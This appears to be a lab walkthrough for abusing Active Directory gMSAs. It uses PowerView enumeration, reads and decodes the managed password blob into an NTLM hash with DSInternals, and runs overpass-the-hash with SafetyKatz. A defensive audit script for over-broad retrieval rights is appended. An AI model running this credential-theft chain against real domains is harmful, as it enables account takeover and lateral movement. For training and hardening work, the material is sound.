
Enumerating gMSA using PowerView

First, load PowerView:

. .\PowerView.ps1


Now let's enumerate the gMSAs:

Get-DomainObject -LDAPFilter '(objectClass=msDS-GroupManagedServiceAccount)'


Now let's see who has permission to read the password blob:

Get-ADServiceAccount -Identity jumpone -Properties * | select PrincipalsAllowedToRetrieveManagedPassword


Now let's read the password blob and convert it to an NTLM hash:

# Read the msDS-ManagedPassword blob (requires being listed in PrincipalsAllowedToRetrieveManagedPassword)
$Passwordblob = (Get-ADServiceAccount -Identity jumpone -Properties msDS-ManagedPassword).'msDS-ManagedPassword'
# DSInternals parses the blob structure and derives the NT hash
Import-Module C:\AD\Tools\DSInternals_v4.7\DSInternals\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword


And we have the hash:

Username: jumpone
ntlmhash: 367032486cc36f7ba0561d7e3e90f615

Now let's OverPass-The-Hash with it:

.\SafetyKatz.exe "sekurlsa::pth /user:jumpone /ntlm:367032486cc36f7ba0561d7e3e90f615 /domain:us.techcorp.local /ptt"
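From the defender's side, the PrincipalsAllowedToRetrieveManagedPassword check above is worth running across every gMSA at once, since the whole chain hinges on who can read the blob. This is an added audit script, not part of the original note; it assumes the RSAT ActiveDirectory module and flags principals that let any domain member, or an individual user account, retrieve a managed password.

```powershell
# Added audit example (not from the original note): list every gMSA and who may
# retrieve its managed password, flagging overly broad grants. Assumes the RSAT
# ActiveDirectory module and read access to the domain.
Import-Module ActiveDirectory

# Principals that should never be allowed to read a gMSA password.
$BroadSids = @('S-1-1-0', 'S-1-5-11')      # Everyone, Authenticated Users
$BroadRids = @('-513', '-515', '-545')     # Domain Users, Domain Computers, Users

function Get-GmsaRetrievalAudit {
    $accounts = Get-ADServiceAccount -Filter 'objectClass -eq "msDS-GroupManagedServiceAccount"' `
        -Properties PrincipalsAllowedToRetrieveManagedPassword

    foreach ($acct in $accounts) {
        $principals = @($acct.PrincipalsAllowedToRetrieveManagedPassword)
        if ($principals.Count -eq 0) {
            # Nobody can fetch the password: the account is unusable, not a risk
            [pscustomobject]@{ gMSA = $acct.SamAccountName; Principal = '<none>'; Sid = ''; Finding = 'No retrieval principal' }
            continue
        }
        foreach ($dn in $principals) {
            $p   = Get-ADObject -Identity $dn -Properties objectSid, sAMAccountName
            $sid = $p.objectSid.Value
            $isBroadRid = [bool]($BroadRids | Where-Object { $sid.EndsWith($_) })

            $finding = 'OK'   # expected case: the host computer account or a tight group
            if ($BroadSids -contains $sid -or $isBroadRid) {
                $finding = 'BROAD: any domain member can read the password'
            } elseif ($p.ObjectClass -eq 'user') {
                $finding = 'Review: individual user account granted retrieval'
            }
            [pscustomobject]@{ gMSA = $acct.SamAccountName; Principal = $p.sAMAccountName; Sid = $sid; Finding = $finding }
        }
    }
}

Get-GmsaRetrievalAudit | Sort-Object Finding -Descending | Format-Table -AutoSize
```

Any 'BROAD' or 'Review' row is a candidate for tightening msDS-GroupMSAMembership to the computer accounts that actually run the service.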